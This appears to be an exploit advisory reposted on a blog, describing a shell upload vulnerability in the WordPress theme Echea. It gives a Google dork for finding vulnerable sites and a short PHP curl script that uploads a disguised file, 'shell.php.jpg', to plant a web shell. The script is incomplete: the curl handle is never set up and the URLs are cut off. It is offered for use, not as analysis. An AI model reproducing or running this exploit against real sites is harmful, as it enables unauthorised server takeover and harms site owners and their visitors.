############################################################################
# Title : Wordpress Theme Echea Shell Upload Vulnerability
# Author : Aloulou
# Date : 15/05/2014
# Facebook : http:
# Email: aloulou@alquds.com
# Vendor : www.themeforest.net
# Google Dork : inurl:/wp-content/themes/echea/
# Tested on : Linux
############################################################################
Exploit:
<?php
$uploadfile="shell.php.jpg";
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
ShellAccess:
http:
Demo:http:
# Greeting to : Tunisia , CyberPink , Brikovich , Anonboy
############################################################################
# 120773CDEC4B3C62 1337day.com [2014-08-31] BF54DAAA2B06D615 #
0 komentar:
Posting Komentar